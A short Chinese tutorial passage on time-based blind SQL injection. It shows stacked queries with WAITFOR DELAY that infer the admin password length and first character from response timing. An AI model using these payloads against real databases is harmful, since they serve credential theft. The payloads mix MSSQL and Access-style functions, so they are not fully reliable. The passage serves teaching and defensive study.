資料萃取

Time based：透過頁面的回應 (wait or not) 以判斷注入的指令有無成功執行，通常用於無任何可靠的頁面回應。

常用的方法於前一相同為推演法：

推算 admin 的密碼長度：

select * from test where A = 1; if (select len(passwd) from users where id = 1) = 1 waitfor delay '0:0:10'--

select * from test where A = 1; if (select len(passwd) from users where id = 1) = 2 waitfor delay '0:0:10'--

select * from test where A = 1; if (select len(passwd) from users where id = 1) = 3 waitfor delay '0:0:10'--

得知長度後，利用二分法推算 admin 的密碼第一位：

select * from test where A = 1; if (select asc(mid(passwd,1,1)) from users where id = 1) > 128 waitfor delay '0:0:10'--

select * from test where A = 1; if (select asc(mid(passwd,1,1)) from users where id = 1) > 64 waitfor delay '0:0:10'--

select * from test where A = 1; if (select asc(mid(passwd,1,1)) from users where id = 1) > 32 waitfor delay '0:0:10'--

這邊只講到這邊， Time-based 的 Injection 較耗時，delay 時間可以自由調整！